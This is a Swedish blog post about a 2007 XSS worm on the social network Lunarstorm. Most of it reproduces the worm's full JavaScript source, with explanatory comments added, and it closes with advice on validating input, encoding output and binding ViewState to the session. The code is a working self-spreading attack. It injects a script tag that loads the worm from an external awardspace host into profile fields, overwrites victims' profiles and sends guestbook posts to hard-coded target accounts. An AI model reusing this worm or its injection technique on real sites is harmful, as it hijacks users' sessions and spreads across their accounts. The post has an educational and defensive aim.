Lunarstorm utsatt för attack

2007-07-15 15:02 | Kategorier » IT-säkerhet, Webb,

Lunarstorm har i natt råkat ut för en XSS-attack. XSS står för ”Cross site scripting” och innebär förenklat att en angripare kan få sin egen kod (här JavaScript) att köras i andra användares webbläsare på sidan – i deras inloggade session och med deras rättigheter. Hålet är nu fixat och de drabbade kontona är återställda.

Masken spred sig genom att man besökte en presentation som redan var ”smittad”, det ledde till att ett script kördes – i den besökandes egen inloggade session – som direkt ändrade ens presentation och lade till sig självt även där. Ovanpå detta så skickades även ett gästboksinlägg till en slumpvis vald av nio fördefinierade användare, varför det är rimligt att anta att skaparen hade något emot just dessa.

Det är i mina ögon uppseendeväckande att en så stor sida som Lunarstorm inte hade högre säkerhet vad gäller sådant här. Något av det första man som webbprogrammerare ser till att skydda sig mot är attacker av det här slaget.

Nedanför följer attackkoden som användes mot Lunarstorm. Orsaken att jag publicerar denna är att fler ska få upp ögonen för vad XSS är och hur man kan skydda sig mot det. Jag ansvarar inte för vad ni gör med koden! Det är inte heller jag som har kodat masken och inte heller är det jag som ligger bakom attacken, bara så att det inte råder det minsta tvivel om det.

// Stage 0: obtain an XMLHttpRequest object. Every later stage of the worm
// reuses this single global `xmlhttp`, so the requests are strictly
// sequential: each stage's onreadystatechange handler starts the next one.
var xmlhttp=false;

/*@cc_on @*/
/*@if (@_jscript_version >= 5)
// JScript gives us Conditional compilation, we can cope with old IE versions.
// and security blocked creation of the objects.
  try {
  xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
  } catch (e) {
   try {
    xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
   } catch (E) {
    xmlhttp = false;
   }
  }
@end @*/

// This is for Internet Explorer. Note it unconditionally re-creates the
// object even if the guarded block above already succeeded, and unlike that
// block it is not wrapped in try/catch.
if(window.ActiveXObject)
{
  xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
/*if (!xmlhttp && typeof XMLHttpRequest!='undefined')*/
else {
  // Every other browser: native XMLHttpRequest.
  xmlhttp = new XMLHttpRequest();
}

    // Per-victim random choices, made once when the script loads: which of
    // the five guestbook texts to post (0..4) and which of the nine target
    // accounts receives it (0..8).
    var r4ndomnr=Math.floor(Math.random()*5);
    var randomnr=Math.floor(Math.random()*9);

    // Guestbook texts (Swedish in-joke / taunt lines). unescape("%E4") etc.
    // produce Latin-1 characters (E4 = ä, F6 = ö, E5 = å) so the file itself
    // stays pure ASCII.
    var gbtext=new Array(5)
     gbtext[0]="Fan va bra du " + unescape("%E4") + "r! :O";
     gbtext[1]="H" + unescape("%F6") + "rru d" + unescape("%F6") + "rru vart la du sillburken?";
     gbtext[2]="Det var en g" + unescape("%E5") + "ng en gris, men den grisen finns inte mer";
     gbtext[3]=unescape("%E4") + "re n" + unescape("%F6") + "tarNNnNnNNN^.";
     gbtext[4]="En kebab, eller kanske tv" + unescape("%E5") + "?";

    // The nine Lunarstorm account GUIDs that receive the guestbook entry
    // (used as ?userid= in sendgb). They are hard-coded, i.e. the worm
    // targets these specific accounts rather than, say, the victim's
    // contacts.
    var gbuser=new Array(9)
     gbuser[0]="{116eb464-606c-4eae-8443-3edf029d3616}";
     gbuser[1]="{d1589118-6869-4146-8d7d-6ed5fc6b134c}";
     gbuser[2]="{c8c39ddd-b646-44db-ba91-af4833f67570}";
     gbuser[3]="{09084660-84CF-4FD1-9953-D98D6487496A}";
     gbuser[4]="{88CB53D0-8961-4D4B-8DF9-E9387A8FEEEA}";
     gbuser[5]="{9162CB93-99AA-4888-AFCC-D917328EC174}";
     gbuser[6]="{8B496A22-C65E-4451-BAE9-E0EA6D92B869}";
     gbuser[7]="{2515B502-3FAB-4258-9B1B-90BE999C7318}";
     gbuser[8]="{B7197B42-DE49-4449-B604-530403BDAC11}";

// Final readystatechange handler of the chain (installed by changepress on
// the presentation-save request): the response is deliberately ignored.
function stop() {
  return;
}

// Stage 3 (runs when the profile-save POST issued by injectscript has
// completed): post one guestbook entry, from the victim's own session, to one
// of the nine hard-coded target accounts in gbuser.
//
// The request is an ASP.NET WebForms postback assembled by hand:
// __EVENTTARGET names the guestbook "send" button and __VIEWSTATE is a fixed
// blob that is never read from the server's response. The base64 appears to
// decode to a .NET 1.x LosFormatter tree (it mentions "mscorlib,
// Version=1.0.5000.0" and a user "goooood"), i.e. it was presumably captured
// from a page rendered for some other account. That the server accepts a
// replayed ViewState inside an arbitrary victim's session suggests ViewState
// was not bound to the user/session — inferred from the payload only, TODO
// confirm.
//
// Fires only on readyState 4 / HTTP 200; on any other outcome the chain
// simply stops here with no error handling.
function sendgb(){
  if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
      {
        var pd;

        // Form body: postback target, empty argument, then the captured
        // __VIEWSTATE (URL-encoded base64, hence %2B / %2F / %3D).
        pd="__EVENTTARGET=sendGuestbook%3A_ctl5%3AbtnSend%3AbtnSend_a&__EVENTARGUMENT=&__VIEWSTATE=dDwxOTk4MzY2NzUzO3Q8cDxsPGZj";
        pd+="O2NwO291O3BpO29pO3VuO3NtO21sO2hwO21jOz47bDxTeXN0ZW0uQnl0ZSwgbXNjb3JsaWIsIFZlcnNpb249MS4wLjUwMDAuMCwgQ3VsdHVyZT1u";
        pd+="ZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5PDA%2BOzUwPDE%2BO288Zj47NTA8MD47U3lzdGVtLkd1aWQsIG1zY29ybGli";
        pd+="LCBWZXJzaW9uPTEuMC41MDAwLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OTxjZTMzYzFhNi03Mjhm";
        pd+="LTQ4MmItYjE5Mi1iN2IyODYzOTQwZmU%2BO2dvb29vb2Q7XGU7aTwxPjtvPGY%2BO2k8MT47Pj47bDxpPDA%2BOz47bDx0PDtsPGk8MT47PjtsPHQ8O2w8aTwxPjtpPD";
        pd+="M%2BOz47bDx0PDtsPGk8MT47aTw3PjtpPDk%2BOz47bDx0PHA8bDxUZXh0Oz47bDxnb29vb29kcyBHw6RzdGJvaywgMSBpbmzDpGdnOz4%2BOzs%";
        pd+="2BO3Q8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Oz47dDxwPGw8VmlzaWJsZTs%2BO2w8bzx0Pjs%2BPjtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7Pj";
        pd+="tsPGdvb29vb2QgaGFyIGludGUgZsOldHQgbsOlZ3JhIGfDpHN0Ym9rc2lubMOkZ2cgw6RuLiA9KDs%2BPjs7Pjs%2BPjs%2BPjt0PDtsPGk8MT47";
        pd+="aTwxMz47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDE%2BOz47bDx0PDtsPGk8Nz47aTw5PjtpPDExPjtpPDEzPjtpPDE1PjtpPDE3PjtpPDE5";
        pd+="PjtpPDIxPjtpPDIzPjtpPDI1PjtpPDI3PjtpPDM1Pjs%2BO2w8dDxwPGw8aHJlZjs%2BO2w8amF2YXNjcmlwdDpjVGhlbWUoJzgxJyk7Pj47Oz47";
        pd+="dDxwPGw8aHJlZjs%2BO2w8amF2YXNjcmlwdDpjVGhlbWUoJzgyJyk7Pj47Oz47dDxwPGw8aHJlZjs%2BO2w8amF2YXNjcmlwdDpjVGhlbWUoJzgz";
        pd+="Jyk7Pj47Oz47dDxwPGw8aHJlZjs%2BO2w8amF2YXNjcmlwdDpjVGhlbWUoJzg0Jyk7Pj47Oz47dDxwPGw8aHJlZjs%2BO2w8amF2YXNjcmlwdDpj";
        pd+="VGhlbWUoJzg1Jyk7Pj47Oz47dDxwPGw8aHJlZjs%2BO2w8amF2YXNjcmlwdDpjVGhlbWUoJzg2Jyk7Pj47Oz47dDxwPGw8aHJlZjs%2BO2w8amF2";
        pd+="YXNjcmlwdDpjVGhlbWUoJzg3Jyk7Pj47Oz47dDxwPGw8aHJlZjs%2BO2w8amF2YXNjcmlwdDpjVGhlbWUoJzg4Jyk7Pj47Oz47dDxwPGw8aHJlZjs%2BO2w8amF2YXNj";
        pd+="cmlwdDpjVGhlbWUoJzg5Jyk7Pj47Oz47dDxwPGw8aHJlZjs%2BO2w8amF2YXNjcmlwdDpjVGhlbWUoJzkwJyk7Pj47Oz47dDxwPGw8c3JjOz47bD";
        pd+="wuLi9fZ2Z4L3RoZW1lL3NtYWxsL2Jhc2U3LmdpZjs%2BPjs7Pjt0PDtsPGk8MT47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PHA8cDxsPFRleHQ7";
        pd+="PjtsPFNraWNrYSZuYnNwXDtpbmzDpGdnOz4%2BOz47Oz47Pj47Pj47Pj47Pj47Pj47Pj47dDxwPHA8bDxGYXZvcml0ZXM7PjtsPDUwPDA%2BOz4%2BOz47Oz47Pj47Pj";
        // The characters just before "&sendGuestbook" look like a 20-byte
        // (SHA-1 sized) ViewState MAC; presumably still valid because the
        // whole blob is replayed unchanged.
        pd+="47Pj47Pj47PtSQQQJsfmCi%2FQXr6%2FP92lpV4dkr&sendGuestbook%3AtxtBuis%3A_txtTextBox=";
        // Guestbook text chosen once per victim (r4ndomnr). Note encodeURI,
        // not encodeURIComponent: '&', '=' and '+' would pass through
        // unencoded into the form body; the five fixed strings happen to
        // contain none of them.
        pd+=encodeURI(gbtext[r4ndomnr]);
        pd+="&sendGuestbook%3AhidTheme=";

        // Target account chosen once per victim (randomnr). The completion
        // handler is changepress, which starts stage 4.
        loadXMLDoc("/gst/gst_guestbook.aspx?userid="+gbuser[randomnr],pd,changepress);
      }
  }

// Stage 4 (runs when the guestbook POST has completed): save the victim's
// presentation page via /set/set_presentation.aspx, again as a hand-built
// WebForms postback with a fixed __VIEWSTATE.
//
// No body-text field is sent in this request: apart from the ViewState the
// only fields are an empty hidStatusMessage and hidHeight=128. Whatever the
// server persists therefore comes from the replayed ViewState itself; its
// first chunk appears to decode to "...l<hidBodyRaw;ddlSoundClip;>;l<Dez3k
// \<3 Pirate's!;\e;>..." — presumably the presentation body gets overwritten
// with that tag line, TODO confirm against the server-side form. The
// self-replicating payload is NOT in this stage; it is the script tag that
// injectscript writes into the homepage field.
//
// stop() is the terminal callback, so this request ends the chain.
function changepress(){
  if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
      {
        var pd;
        // Disabled earlier variant left in by the author: a "preview"
        // postback (btnPreview) that sent txtBody="Dezek, grisris,
        // sillburken <3". Commented out, never executed.
        /*
        pd="__EVENTTARGET=_ctl22%3AbtnPreview%3AbtnPreview_a&__EVENTARGUMENT=&__VIEWSTATE=dDw2NzY5NjU4NTt0PDtsPGk8MD47PjtsPHQ8O2w8aTwxMz47";
        pd+="aTwxNT47aTwxNz47PjtsPHQ8O2w8aTwxPjs%2BO2w8dDxwPGw8b25zdWJtaXQ7PjtsPHJldHVybiB2YWxpZGF0ZSgpOz4%2BO2w8aTwzPjs%2BO2w8dDxwPGw8VmlzaW";
        pd+="JsZTs%2BO2w8bzx0Pjs%2BPjtsPGk8MT47aTwyPjtpPDY%2BOz47bDx0PHA8bDxWaXNpYmxlOz47bDxvPHQ%2BOz4%2BOzs%2BO3Q8O2w8aTwxMz47aTwyOT47aTwzMT47PjtsPHQ8cDw7cD";
        pd+="xsPG9uQ2xpY2s7PjtsPHVwZGF0ZUJvb2xWYWxzKCdjaGJQaG90b1RvUmlnaHQnLCB0aGlzLmNoZWNrZWQpXDs7Pj4%2BOzs%2BO3Q8O2w8aTwzPjs%2BO2w8dDw7bDxp";
        pd+="PDE%2BO2k8Mz47PjtsPHQ8cDw7cDxsPG9uY2xpY2s7PjtsPGphdmFzY3JpcHQ6IERpdlBvcChiZ1NvdW5kMSlcOzs%2BPj47Oz47dDxwPDtwPGw8b25jbGljazs%2BO2";
        pd+="w8amF2YXNjcmlwdDogRGl2UG9wKGJnU291bmQyKVw7Oz4%2BPjs7Pjs%2BPjs%2BPjt0PDtsPGk8Mz47PjtsPHQ8O2w8aTwxPjs%2BO2w8dDx0PHA8O3A8bDxvbmNoYW5nZTs%2BO2w8amF2";
        pd+="YXNjcmlwdDogQ2hhbmdlRHJvcERvd25NVCgpXDs7Pj4%2BOzs%2BOzs%2BOz4%2BOz4%2BOz4%2BO3Q8O2w8aTwyPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PDtsPGk8MD47PjtsPHQ8cDxw";
        pd+="PGw8VGV4dDs%2BO2w8RsO2cmhhbmRzZ3JhbnNrbmluZw0KOz4%2BOz47Oz47Pj47Pj47Pj47Pj47Pj47Pj47dDw7bDxpPDE%2BOz47bDx0PHA8bDxWaXNpYmxlOz47bD";
        pd+="xvPHQ%2BOz4%2BOzs%2BOz4%2BO3Q8cDxsPFRleHQ7PjtsPE5vcm1hbGl6ZSgnaGV4JylcOzs%2BPjs7Pjs%2BPjs%2BPjs%2BZkk9eSmxt66riAu%2B2Wmss4EzRXM%3D";
        pd+="&txtBody=";
        pd+=encodeURI("Dezek, grisris, sillburken <3");
        */

        // Live variant: btnSaveChanges postback with a fixed __VIEWSTATE.
        pd="__EVENTTARGET=btnSaveChanges%3AbtnSaveChanges_a&__EVENTARGUMENT=&__VIEWSTATE=dDw2NzY5NjU4NTt0PHA8bDxoaWRCb2R5U";
        pd+="mF3O2RkbFNvdW5kQ2xpcDs%2BO2w8RGV6M2sgXDwzIFBpcmF0ZSdzITtcZTs%2BPjtsPGk8MD47PjtsPHQ8O2w8aTwxMz47aTwxNT47aTwxNz47P";
        pd+="jtsPHQ8O2w8aTwxPjs%2BO2w8dDxwPGw8b25zdWJtaXQ7PjtsPHJldHVybiB2YWxpZGF0ZSgpOz4%2BO2w8aTwzPjtpPDU%2BOz47bDx0PHA8bDxWaXNpYmxlOz47bDx";
        pd+="vPGY%2BOz4%2BO2w8aTwxPjtpPDI%2BO2k8Nj47PjtsPHQ8cDxsPFZpc2libGU7PjtsPG88dD47Pj47Oz47dDw7bDxpPDEzPjtpPDI5PjtpPDMxP";
        pd+="js%2BO2w8dDxwPDtwPGw8b25DbGljazs%2BO2w8dXBkYXRlQm9vbFZhbHMoJ2NoYlBob3RvVG9SaWdodCcsIHRoaXMuY2hlY2tlZClcOzs%2BPj4";
        pd+="7Oz47dDw7bDxpPDM%2BOz47bDx0PDtsPGk8MT47aTwzPjs%2BO2w8dDxwPDtwPGw8b25jbGljazs%2BO2w8amF2YXNjcmlwdDogRGl2UG9wKGJnU";
        pd+="291bmQxKVw7Oz4%2BPjs7Pjt0PHA8O3A8bDxvbmNsaWNrOz47bDxqYXZhc2NyaXB0OiBEaXZQb3AoYmdTb3VuZDIpXDs7Pj4%2BOzs%2BOz4%2BOz4%2BO3Q8O2w8aTw";
        pd+="zPjs%2BO2w8dDw7bDxpPDE%2BOz47bDx0PHQ8cDw7cDxsPG9uY2hhbmdlOz47bDxqYXZhc2NyaXB0OiBDaGFuZ2VEcm9wRG93bk1UKClcOzs%2BP";
        pd+="j47Oz47Oz47Pj47Pj47Pj47dDw7bDxpPDI%2BOz47bDx0PDtsPGk8MD47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDxwPHA8bDxUZXh0Oz47bDxGw7Zya";
        pd+="GFuZHNncmFuc2tuaW5nDQo7Pj47Pjs7Pjs%2BPjs%2BPjs%2BPjs%2BPjt0PHA8bDxWaXNpYmxlOz47bDxvPHQ%2BOz4%2BO2w8aTwzPjtpPDQ%2BO2k8NT47PjtsPHQ";
        pd+="8O2w8aTw1PjtpPDc%2BOz47bDx0PHA8bDxUZXh0Oz47bDwxODs%2BPjs7Pjt0PHA8bDxUZXh0Oz47bDwyMDAwMDs%2BPjs7Pjs%2BPjt0PDtsPGk";
        pd+="8MT47aTwzPjs%2BO2w8dDxwPGw8dXNlcklEO2dlbmRlcjtwaWN0dXJlO3VzZXJuYW1lO2JpcnRoRGF0ZTs%2BO2w8U3lzdGVtLkd1aWQsIG1zY29";
        pd+="ybGliLCBWZXJzaW9uPTEuMC41MDAwLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OTxjZTMzYzFhNi0";
        pd+="3MjhmLTQ4MmItYjE5Mi1iN2IyODYzOTQwZmU%2BO288Zj47aTwwPjtnb29vb29kO1N5c3RlbS5EYXRlVGltZSwgbXNjb3JsaWIsIFZlcnNpb249M";
        pd+="S4wLjUwMDAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5PDE5ODYtMDQtMDQ%2BOz4%2BOzs%2BO3Q";
        pd+="8cDxsPFRleHQ7PjtsPERlejNrICZsdFw7MyBQaXJhdGUncyE7Pj47Oz47Pj47dDw7bDxpPDE%2BO2k8Mz47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDx";
        pd+="wPHA8bDxUZXh0Oz47bDzDhG5kcmENCjs%2BPjs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjs%2BO2w8dDxwPHA8bDxUZXh0Oz47bDxTcGFyYSZuYnNwX";
        pd+="Dtmw7Zyw6RuZHJpbmdhcg0KOz4%2BOz47Oz47Pj47Pj47Pj47Pj47Pj47dDw7bDxpPDE%2BOz47bDx0PHA8bDxWaXNpYmxlOz47bDxvPGY%2BOz4%2BOzs%2BOz4%2BO3Q8cDxsPFRleHQ7P";
        // Trailing part of the blob (what looks like a MAC) plus the only two
        // ordinary form fields in this request.
        pd+="jtsPEluaXRQcmV2aWV3KClcOzs%2BPjs7Pjs%2BPjs%2BPjs%2Bg2aHZwq703N3OpvAAhWxjK5MbYU%3D&hidStatusMessage=&hidHeight=128";

        // stop() ignores the response; nothing further is sent.
        loadXMLDoc("/set/set_presentation.aspx",pd,stop);
      }
  }

// Stage 2 — the propagation step. Runs when the initial GET of
// /set/set_public.aspx (see the bottom of the file) has completed; the
// response body itself is never read. It re-submits the victim's public
// profile form with a fixed __VIEWSTATE and attacker-chosen field values.
//
// txtHomepage is the stored-XSS vector. URL-decoded it reads
//   www.hamsterpaj.net/forum/hamsterpaj/allmaent_om_hamsterpaj/foersvarstal_foer_forumet/"><script/src=http://koppiem.awardspace.com/script.js></script><a
// i.e. a plausible-looking URL, then `">` to close the href attribute the
// site echoes the value into, then a <script> tag that loads the worm from an
// external host (presumably this very file), then `<a` to swallow the rest of
// the original anchor. Anyone who views the profile runs the remote script in
// their own session. The `<script/src=` form (slash instead of a space) may
// be intended to slip past a naive pattern filter — TODO confirm; the page
// does not say what filtering, if any, was in place.
//
// The other fields (hidHasPhoto, geoCountry/City/Region, txtMsnMessenger,
// ddlA1..ddlA9, ...) are overwritten with fixed values too, so the victim's
// profile data is clobbered, not merely extended.
function injectscript(){
  if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
      {
        var pd;
        pd="__EVENTTARGET=Buttons1%3AbtnSave%3AbtnSave_a&__EVENTARGUMENT=";
        // Short fixed ViewState (a .NET 1.x-style "t<...;;>" tree followed by
        // what looks like a 20-byte MAC), replayed rather than taken from the
        // GET response.
        pd+="&__VIEWSTATE=dDwtMTI5NjAyNzE5Ozs%2BZlKIxAVJgXhhZ8sZa4X73mExPZ4%3D&hdAvId=av0";
        // A long run of '+' (form-encoded spaces). Purpose not evident from
        // this listing — possibly padding a status field to a length the
        // server-side form expects. TODO confirm.
        pd+="&hidStatusMessage=++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++";
        pd+="&hidHasPhoto=0&geoCountry=231&geoCity=1163&geoRegion=17&txtCityArea=&txtHomepage=";
        // The XSS payload described in the header comment, URL-encoded by hand.
        pd+="www.hamsterpaj.net%2Fforum%2Fhamsterpaj%2Fallmaent_om_hamsterpaj%2Ffoersvarstal_foer_forumet%2F%22%3E%3Cscript%2Fsrc%3Dhttp%3A%2F%2Fkoppiem.awardspace.com%2Fscript.js%3E%3C%2Fscript%3E%3Ca";
        pd+="&txtIcqNumber=&txtMsnMessenger=";
        // The doubled ';' is just an empty statement, harmless.
        pd+=encodeURI("Dezek Grisris sillburken <3");;
        pd+="&txtSkype=&ddlA1=0";
        pd+="&ddlA2=0&ddlA3=0&ddlA4=0&ddlA5=0&ddlA6=0&ddlA7=0&ddlA8=0&ddlA9=0";
        // On success, sendgb (stage 3) runs as the completion handler.
        loadXMLDoc("/set/set_public.aspx",pd,sendgb);

      }
  }

// Set on every loadXMLDoc call; never read anywhere else in this listing.
var ie;

// Thin wrapper around the shared global `xmlhttp`: issue an asynchronous
// same-origin request to `url` and install `func` as the readystatechange
// handler. An empty `foo` means GET; any other value is sent as a
// form-encoded POST body.
function loadXMLDoc(url, foo, func) {
  // Legacy IE detection via document.all (the result is unused).
  ie = document.all ? true : false;

  var isPost = (foo != "");
  xmlhttp.open(isPost ? "POST" : "GET", url, true);
  xmlhttp.onreadystatechange = func;

  if (!isPost) {
    xmlhttp.send(null);
    return;
  }

  xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  xmlhttp.send(foo);
}

// Entry point (stage 1): GET the victim's own public-profile settings page.
// The response is not used for anything — it only sequences the chain —
// but because the request is same-origin it is made with the victim's
// cookies, which is what lets every later stage act as that user.
// injectscript runs when this completes.
loadXMLDoc("/set/set_public.aspx","",injectscript);

Hur kunde Lunarstorm skyddat sig mot detta? Enkelt, genom att helt enkelt se över vilka värden man tar emot i sina fält (här: att en hemsideadress faktiskt ser ut som en adress och inte innehåller citattecken eller vinkelparenteser). Genom att inte skriva ut data utan att ha HTML-kodat den – och kodningen måste passa sammanhanget: värdet skrivs ut inuti ett href-attribut, så även citattecken måste kodas, annars räcker det med ett "> för att bryta sig ur attributet, vilket är precis vad masken gör. Hade dessa två enkla regler följts så skulle masken inte kunnat sprida sig. Värt att notera är också att masken skickar hårdkodade __VIEWSTATE-värden i alla sina anrop; att servern godtar dem i vilken användares session som helst tyder på att ViewState inte var knutet till den inloggade användaren.



